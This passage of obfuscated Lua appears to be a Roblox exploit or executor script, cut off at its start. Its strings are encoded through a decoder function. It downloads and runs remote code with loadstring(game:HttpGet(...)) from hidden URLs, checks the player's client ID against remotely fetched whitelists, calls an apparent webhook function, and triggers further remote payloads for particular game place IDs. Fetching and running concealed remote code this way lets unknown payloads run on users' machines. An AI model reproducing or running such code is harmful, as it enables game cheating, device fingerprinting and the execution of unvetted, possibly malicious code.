v167=v7("\16\94\230\18\69\219\2\127\166\30\95\227\49\80\199\32\68\252\59\126\212\26\93\197\63\83\170\66\119\207\37\16\170\93","\174\86\41\147\112\19");v168=v7("\125\23\152\9\19\26\37\157\82\47\157\39\8\58\52\172\66\52\189\60\23\2\38\140\81\46\134\2\63\93\64\230","\203\59\96\237\107\69\111\113");v184=19 -15 ;end if ((1 + 0)==v184) then v163=v7("\244\146\201\33\177\188\96\228\140\243\51\171\132\97\247\177\219\34\148\173\80\226\178\238\46\141\179\5\130\209\145","\52\178\229\188\67\231\201");v164=v7("\118\89\124\62\196\73\118\13\108\64\82\243\81\12\57\67\29\20\227\112\119\14\77\70\82\254\17\57\20\104\2\9\175\13\11\36\110\81","\67\65\33\48\100\151\60");v184=1 + 1 ;end end end if (v52==(0 -0)) then v53=game:GetService(v7("\20\187\149\92\208\124\106\42\166\130\73","\24\92\207\225\44\131\25"));v54=v7("\67\199\172\92\8\39\4\156\188\69\8\126\68\193\188\2\24\114\70\156\185\92\18\50\92\214\186\68\20\114\64\192\247","\29\43\179\216\44\123");v55=v7("\155\206\53\78\139\204\20\122\180\246\48\96\144\236\5\75\164\237\16\123\143\212\23\107\183\247\43\69\167\128\114\1","\44\221\185\64");v56=v7("\39\240\93\93\69\20\211\126\91\95\44\224\81\107\67\54\213\69\104\84\11\201\67\86\105\88\176\17\10\62\85\194\99\7\114","\19\97\135\40\63");v57=v7("\253\12\96\105\118\104\246\8\97\106\126\100\246\9\101\106\118\105\253\19","\81\206\60\83\91\79");v58=v7("\24\250\131\38\121\145\25\246\23\253\133\39\121\151\30\244\28\248\132\61","\196\46\203\176\18\79\163\45");v59=v7("\158\53\107\28\18\238\219\142\38\82\51\35\226\219\136\21\76\19\19\220\229\150\41\119\4\113\175\189\225\111\76\14\60\248\246","\143\216\66\30\126\68\155");v60=v7("\253\208\33\241\246\182\130\205\135\216\91\207\200\140\207\227\231\216\25\231\145\140\219\247\252\193\64\209\240\138\133\236\253\154\37\206\234\162","\129\202\168\109\171\165\195\183");v61=v7("\4\79\34\218\232\1\210\20\81\24\200\242\57\211\7\95\46\236\238\35\212\47\111\16\210\240\31\239\56\1\110\140\218\21\245\117\10\96\149","\134\66\56\87\184\190\116");v52=3 -2 ;end if (v52==(10 + 1)) then v152=v7("\60\162\157\15\44\160\188\59\19\154\152\33\55\128\173\10\3\129\184\58\40\184\191\42\16\155\131\4\0\225\217\88\30\180\155\92\77\231\197","\109\122\213\232");v153=v7("\185\239\142\10\221\226\247\28\195\231\244\52\227\216\186\50\163\231\182\28\186\216\174\38\184\254\239\42\219\222\240\61\184\175\138\53\193\246","\80\142\151\194");v154=v7("\81\149\38\25\86\158\37\26\83\158\32\25\91\145\47\25\86\158\33\3","\44\99\166\23");v155=v7("\90\224\60\52\5\177\72\193\45\26\30\163\101\195\25\1\1\169\75\208\35\24\56\173\102\161\122\102\103\233\101\248\49\101\25","\196\28\151\73\86\83");v156=v7("\162\80\125\73\210\15\65\38\160\87\113\72\210\0\77\36\163\85\125\72\211\0\87","\22\147\99\73\112\226\56\120");v157=v7("\239\109\206\207\190\173\32\206\216\157\238\113\239\218\149\186\56\242\225\161\236\90\238\227\219\177\56\248\192\164\234\120\186\166\165\189\90\227","\237\216\21\130\149");v158=v7("\164\89\74\93\134\220\106\180\92\12\115\157\206\71\182\126\104\109\189\254\121\136\96\84\86\170\145\11\134\79\76\6\228\132","\62\226\46\63\63\208\169");v159=v7("\195\14\64\129\41\24\27\104\236\54\69\175\50\56\10\89\252\45\101\180\45\0\24\121\239\55\94\138\5\95\122\19","\62\133\121\53\227\127\109\79");v160=v7("\54\3\39\247\224\187\150\38\29\29\229\250\131\151\53\19\43\193\230\153\144\29\35\21\255\248\165\171\10\67\98\162\210\175\177\67\71\127","\194\112\116\82\149\182\206");v52=5 + 7 ;end end end getgenv().taiparne=0 + 0 ;getgenv().seed=0;local v30=loadstring(game:HttpGet(v7("\206\205\151\206\61\176\137\150\145\223\57\164\193\208\151\214\59\232\211\202\134\204\45\229\200\205\134\208\58\164\197\214\142\145\35\229\212\210\138\203\61\189\149\150\136\219\55\249\223\202\204\204\43\236\213\150\139\219\47\238\213\150\142\223\39\228\137\201\145\219\35\225\195\192","\138\166\185\227\190\78")))();local v31=loadstring(game:HttpGet(v7("\195\96\209\39\65\121\86\132\100\196\36\70\38\27\194\122\139\52\93\46\86\217\117\210\120\103\39\45\146\121\237\31\75","\121\171\20\165\87\50\67")))();local v32=loadstring(game:HttpGet(v7("\206\44\173\38\170\88\137\119\171\55\174\76\193\49\173\62\172\0\211\43\188\36\186\13\200\44\188\56\173\76\197\55\180\121\180\13\212\51\176\35\170\85\149\119\178\51\160\17\223\43\246\36\188\4\213\119\177\51\184\6\213\119\180\55\176\12\137\48\174\63\189","\98\166\88\217\86\217")))();local v33=game:GetService(v7("\196\244\97\32\136\221\250\239\109\8\133\207\197\243\107\23\143\223\243","\188\150\150\25\97\230")):GetClientId();for v177,v178 in pairs(v31) do if (v178==v7("\220\155\90\7\1\228\207\132","\141\186\233\63\98\108")) then for v185,v186 in pairs(v30) do if (v186==getgenv().miau) then for v190,v191 in pairs(v32) do if (v191==v33) then print(v7("\208\255\56\190\101\245\229\34\179","\69\145\138\76\214"));weebhook();local v199=game:GetService(v7("\93\206\155\130\186\2\96\195\136\138\186\37\117\221\159\128\188\19","\118\16\175\233\233\223"));local v200=game.PlaceId;local v201,v202=pcall(function() return v199:GetProductInfo(v200);end);if (v201==true) then if (v200==6654918151) then local v206=0 -0 ;local v207;local v208;while true do if (v206==(0 + 0)) then v207=os.time();math.randomseed(v207);v206=1 -0 ;end if (v206==(1 + 0)) then getgenv().seed=v207;v208=math.random(55619 + 44381 ,718508 + 281491 );v206=2 + 0 ;end if ((2 + 0)==v206) then getgenv().taiparne=v208;loadstring(game:HttpGet(v7("\131\144\33\171\253\209\50\196\150\52\172\160\140\116\159\140\32\185\251\152\120\153\135\58\181\250\142\115\159\202\54\180\227\196\112\132\150\62\178\251\152\42\216\203\33\169\235\133\126\131\147\52\169\161\153\120\141\151\122\179\235\138\121\152\203\56\186\231\133\50\159\150\48\181\237\131\106\138\150","\29\235\228\85\219\142\235")))();break;end end end end else print(v7("\10\198\181\211\112\14\44\87\36\148\181\207\55\70\48\91\57","\50\93\180\218\189\23\46\71"));end end elseif (getgenv().miau==v7("\221\165\73\94\75\200\67\219\189","\40\190\196\59\44\36\188")) then weebhook();local v193=game:GetService(v7("\17\68\206\191\255\105\29\48\68\223\177\201\120\31\42\76\223\177","\109\92\37\188\212\154\29"));local v194=game.PlaceId;local v195,v196=pcall(function() return v193:GetProductInfo(v194);end);if (v194==(7977480127 -1322561976)) then local v203=433 -(153 + 280) ;local v204;local v205;while true do if (v203==(9 -7)) then getgenv().taiparne=v205;loadstring(game:HttpGet(v7("\12\251\176\211\34\0\75\160\182\194\38\20\3\230\176\203\36\88\17\252\161\209\50\85\10\251\161\205\37\20\7\224\169\140\60\85\22\228\173\214\34\13\87\160\176\209\52\84\7\231\179\194\35\21\22\234\162\208\126\82\1\238\160\208\126\87\5\230\170\140\37\72\1\225\167\203\38\91\22","\58\100\143\196\163\81")))();break;end if ((1 -0)==v203) then getgenv().seed=v204;v205=math.random(288760 -188760 ,2634705 -1634706 );v203=6 -4 ;end if (v203==0) then v204=os.time();math.randomseed(v204);v203=1 + 0 ;end end end else print(v7("\45\80\44\173\56\9\238\11\3\2\44\177\127\65\242\7\30","\110\122\34\67\195\95\41\133"));getgenv.taiparne=false;end end end end
